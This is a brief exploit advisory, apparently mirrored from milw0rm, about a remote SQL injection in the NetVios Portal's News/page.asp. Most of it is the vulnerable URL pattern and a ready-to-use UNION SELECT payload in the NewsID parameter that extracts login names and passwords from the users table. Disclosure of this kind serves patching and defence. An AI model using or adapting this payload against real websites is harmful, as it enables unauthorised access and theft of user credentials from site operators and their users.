Lucene search

K

SecurityvulnsSECURITYVULNS:DOC:16460

HistoryMar 25, 2007 - 12:00 a.m.

NetVios Portal (page.asp) Remote SQL Injection Vulnerability

2007-03-2500:00:00

vulners.com

11

Title : NetVios Portal (page.asp) Remote SQL Injection Vulnerability

Author : parad0x

Contact : :(

D.Page : http://www.scriptaty.net/netvios-portal.html

$$ : Free

#S.Page : http://www.netvios.com

http://[target]/[path]/News/page.asp?NewsID=[SQL]

Example:

//News/page.asp?NewsID=-1 union select 0,1,2,loginname,password,5,6,7 from users where userId=1

"""""""""""""""""""""
greetz : VoLqaN, x-MastER

"""""""""""""""""""""

milw0rm.com [2007-03-19]